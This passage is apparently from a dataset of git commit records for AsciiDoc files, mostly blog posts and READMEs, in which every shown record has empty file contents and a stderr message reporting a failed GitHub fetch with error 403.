403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c37712bee149aa31f34f6a9f2dee5087348c509","subject":"Update 2017-10-11-use-storage-service-safely.adoc","message":"Update 2017-10-11-use-storage-service-safely.adoc","repos":"wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io","old_file":"_posts\/2017-10-11-use-storage-service-safely.adoc","new_file":"_posts\/2017-10-11-use-storage-service-safely.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wushaobo\/wushaobo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8d19bff64081d17339d173fe3588702dc1c2a7a","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45237f607fd327c6d596e8861f13268f21b00e26","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e04c5ab847cff6c78e7986ecc018bfd977e743e0","subject":"FORGE-957: Added README.asciidoc","message":"FORGE-957: Added README.asciidoc\n","repos":"stalep\/forge-core,D9110\/core,agoncal\/core,ivannov\/core,pplatek\/core,ivannov\/core,ivannov\/core,agoncal\/core,ivannov\/core,agoncal\/core,D9110\/core,agoncal\/core,pplatek\/core,ivannov\/core,ivannov\/core,stalep\/forge-core,oscerd\/core,ivannov\/core,agoncal\/core,pplatek\/core,forge\/core,D9110\/core,forge\/core,oscerd\/core,oscerd\/core,pplatek\/core,oscerd\/core,D9110\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,jerr\/jbossforge-core,forge\/core,D9110\/core,jerr\/jbossforge-core,oscerd\/core,forge\/core,ivannov\/core,forge\/core,forge\/core,ivannov\/core,forge\/core,forge\/core,pplatek\/core,agoncal\/core,oscerd\/core,jerr\/jbossforge-core,pplatek\/core,ivannov\/core,D9110\/core,pplatek\/core,jerr\/jbossforge-core,oscerd\/core,oscerd\/core,pplatek\/core,jerr\/jbossforge-core,agoncal\/core,forge\/core,pplatek\/core,D9110\/core,agoncal\/core,D9110\/core,D9110\/core,pplatek\/core,oscerd\/core,jerr\/jbossforge-core,agoncal\/core,jerr\/jbossforge-core,D9110\/core,jerr\/jbossforge-core,forge\/core,agoncal\/core,oscerd\/core","old_file":"stacks\/README.asciidoc","new_file":"stacks\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/D9110\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e11070bcfaed301d1c0e9358518eebacd9f9992e","subject":"Fix macros in changelog (#30269)","message":"Fix macros in changelog (#30269)\n\nremove comments for macros which caused macros not to work 
correctly\r\n","repos":"uschindler\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/CHANGELOG.asciidoc","new_file":"docs\/CHANGELOG.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cb93e408123d6d18798c23286b2dd2479d1d30c","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2893b67646632f99b073e2c75ebec3522ef8e5cd","subject":"Update 201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Update 201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"_posts\/201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56e2e31c81476ebcde709525e6ee549d91e16c8e","subject":"Update 2016-02-11-Curso-Alura-Javascript-Review.adoc","message":"Update 2016-02-11-Curso-Alura-Javascript-Review.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2016-02-11-Curso-Alura-Javascript-Review.adoc","new_file":"_posts\/2016-02-11-Curso-Alura-Javascript-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2985d26d321c7cc5fe733697a2506330abea572","subject":"Update 
2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"109ac1bff970c70902fe7cf85b11594998312e6d","subject":"MAILBOX-234 Documentation of JSON structure","message":"MAILBOX-234 Documentation of JSON structure\n\ngit-svn-id: 3e91be830998880cf64a843733475f92c6afa332@1688111 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"tools4origins\/james-mailbox,rouazana\/james-mailbox,linagora\/james-mailbox,mbaechler\/james-mailbox,aduprat\/james-mailbox","old_file":"elasticsearch\/jsonStructure.adoc","new_file":"elasticsearch\/jsonStructure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aduprat\/james-mailbox.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"47c88d0f28bf2a32187ea5e2bd4c6b28cc72d70c","subject":"Create README.adoc","message":"Create README.adoc","repos":"nmcl\/golang","old_file":"example\/src\/README.adoc","new_file":"example\/src\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmcl\/golang.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"063c1c32639d17fc91e25753db0366525c3707c4","subject":"Update 2017-04-01-image-File-Reader.adoc","message":"Update 2017-04-01-image-File-Reader.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-01-image-File-Reader.adoc","new_file":"_posts\/2017-04-01-image-File-Reader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0879faddd403e8b80629bb81368f92e1cc5f4bd","subject":"Update 2017-05-18-I-want-faster-IDE.adoc","message":"Update 2017-05-18-I-want-faster-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-18-I-want-faster-IDE.adoc","new_file":"_posts\/2017-05-18-I-want-faster-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f66f4ca2fc60ab8fe1fd85f17e751e1b2f0bb92","subject":"Update 2097-1-1-Puzzle-4-No-Hacking.adoc","message":"Update 
2097-1-1-Puzzle-4-No-Hacking.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2097-1-1-Puzzle-4-No-Hacking.adoc","new_file":"_posts\/2097-1-1-Puzzle-4-No-Hacking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc73c82170393f36a311cd558bf3177df8160c99","subject":"y2b create post PS3 PULSE Wireless Stereo Headset Elite Edition Unboxing (New PlayStation 3 Wireless Gaming Headset)","message":"y2b create post PS3 PULSE Wireless Stereo Headset Elite Edition Unboxing (New PlayStation 3 Wireless Gaming Headset)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-28-PS3-PULSE-Wireless-Stereo-Headset-Elite-Edition-Unboxing-New-PlayStation-3-Wireless-Gaming-Headset.adoc","new_file":"_posts\/2012-09-28-PS3-PULSE-Wireless-Stereo-Headset-Elite-Edition-Unboxing-New-PlayStation-3-Wireless-Gaming-Headset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"834e293e962590e4bf73611d337d932807464baf","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b116026907e778e9d777a72073754378c1a48c04","subject":"Update 2018-08-29-ECU.adoc","message":"Update 2018-08-29-ECU.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-08-29-ECU.adoc","new_file":"_posts\/2018-08-29-ECU.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50560b34a1289436606014352750637260404288","subject":"[HWKMETRICS-334] Add limit and order documentation.","message":"[HWKMETRICS-334] Add limit and order 
documentation.\n","repos":"jotak\/hawkular-metrics,pilhuhn\/rhq-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,tsegismont\/hawkular-metrics,hawkular\/hawkular-metrics,mwringe\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,jotak\/hawkular-metrics,pilhuhn\/rhq-metrics,jotak\/hawkular-metrics,ppalaga\/hawkular-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,mwringe\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,burmanm\/hawkular-metrics,tsegismont\/hawkular-metrics,ppalaga\/hawkular-metrics","old_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1cd0911d9fccdb2167a69f020d7ee415e0f46d3d","subject":"Update 2015-09-22-Een-nieuw-blog.adoc","message":"Update 2015-09-22-Een-nieuw-blog.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-09-22-Een-nieuw-blog.adoc","new_file":"_posts\/2015-09-22-Een-nieuw-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f49ae6c81b7a7074e71bf07cac104a178231cf86","subject":"release notes 6.3","message":"release notes 6.3\n","repos":"oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca7738aac6421d5260d3e785bb3e01c1af7e42a4","subject":"add asciidoc readme","message":"add asciidoc readme\n","repos":"beyama\/winter,beyama\/winter,beyama\/winter","old_file":"doc\/readme.adoc","new_file":"doc\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beyama\/winter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9f3bc9a703871047bf3e6f59aaa68fad43e44b2","subject":"Update 2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","message":"Update 
2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","new_file":"_posts\/2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c56f535334e11657945df45f4c4e78160307dbea","subject":"Update 2016-12-20-this-is-test.adoc","message":"Update 2016-12-20-this-is-test.adoc","repos":"xfarm001\/xfarm001.github.io,xfarm001\/xfarm001.github.io,xfarm001\/xfarm001.github.io,xfarm001\/xfarm001.github.io","old_file":"_posts\/2016-12-20-this-is-test.adoc","new_file":"_posts\/2016-12-20-this-is-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xfarm001\/xfarm001.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dd5beec7d91e8ca8f0d00dbc2838f752a8aeac9","subject":"y2b create post Call of Duty Black Ops 2 Care Package Unboxing (COD Black Ops II Special Edition)","message":"y2b create post Call of Duty Black Ops 2 Care Package Unboxing (COD Black Ops II Special Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-13-Call-of-Duty-Black-Ops-2-Care-Package-Unboxing-COD-Black-Ops-II-Special-Edition.adoc","new_file":"_posts\/2012-11-13-Call-of-Duty-Black-Ops-2-Care-Package-Unboxing-COD-Black-Ops-II-Special-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14166032b3a922fb400be398c3e1db8451dd927f","subject":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","message":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84f04b98e3f9f95699991e40d3667850fbe4c249","subject":"y2b create post The Fastest WiFi I've Tested...","message":"y2b create post The Fastest WiFi I've Tested...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-15-The-Fastest-WiFi-Ive-Tested.adoc","new_file":"_posts\/2016-08-15-The-Fastest-WiFi-Ive-Tested.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1370eee4bceb6e73d94e113de4340ae15b42475d","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 
2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed15b3729d7a9a6b1e07b352a573b69ace232534","subject":"Update 2017-03-13-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","message":"Update 2017-03-13-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2017-03-13-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","new_file":"_posts\/2017-03-13-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62006590f93d81e498c65a059042f4a42bff855f","subject":"y2b create post $10 Mouse Vs. $70 Mouse","message":"y2b create post $10 Mouse Vs. $70 Mouse","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-05-10-Mouse-Vs-70-Mouse.adoc","new_file":"_posts\/2017-05-05-10-Mouse-Vs-70-Mouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae4aee2ff33707a0a68d5943e3bc650bbfe13ca0","subject":"fix: image\u306e\u30d1\u30b9\u4fee\u6b63","message":"fix: image\u306e\u30d1\u30b9\u4fee\u6b63\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d463401bca518073c5b80989da983ed13bd10cff","subject":"Update 2018-07-02-FW4SPL-1700-released.adoc","message":"Update 2018-07-02-FW4SPL-1700-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2018-07-02-FW4SPL-1700-released.adoc","new_file":"_posts\/2018-07-02-FW4SPL-1700-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7284c430d8a02879762cb23fa0ee7b9ab2b88684","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 
2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5229e69f24cbdeb306b636a2ece866a415a9bfd","subject":"y2b create post Gran Turismo 5 Collector's Edition Unboxing","message":"y2b create post Gran Turismo 5 Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-21-Gran-Turismo-5-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2012-01-21-Gran-Turismo-5-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49dd292808905954256f7b34ed79b0c2cfa93672","subject":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","message":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7754aeb8ed8ae04e639066bddd73152755cbe43b","subject":"Update 2017-12-17-.adoc","message":"Update 2017-12-17-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-17-.adoc","new_file":"_posts\/2017-12-17-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01ccbd969d54054369ce1d9e239350498971b02f","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31ced6b5c87c0b30f8dd12b0c1b031320e4a7dfe","subject":"Create README.adoc","message":"Create README.adoc","repos":"rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python","old_file":"fade\/database\/README.adoc","new_file":"fade\/database\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/rockwolf\/python.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ece8f7748c646d9e5be46c1eb360dcf29125cfdf","subject":"Create 2016-10-05-Date-Test.adoc","message":"Create 2016-10-05-Date-Test.adoc","repos":"pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io","old_file":"_posts\/2016-10-05-Date-Test.adoc","new_file":"_posts\/2016-10-05-Date-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pallewela\/pallewela.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d476235dfaccd540ea3bdbe251b32a63ea0237df","subject":"Update 2018-08-25-Laravel56.adoc","message":"Update 2018-08-25-Laravel56.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56.adoc","new_file":"_posts\/2018-08-25-Laravel56.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be96aa5005761e045757d0369fd4918e4d6a60fe","subject":"Update 2016-08-21-Vim-is-awsome.adoc","message":"Update 2016-08-21-Vim-is-awsome.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-Vim-is-awsome.adoc","new_file":"_posts\/2016-08-21-Vim-is-awsome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fd73c88c9638ca0f1293a48bb20813d095f3470","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdd90286e1960611c994ffa2c4cd3626484c5bf6","subject":"Update READMY.adoc","message":"Update 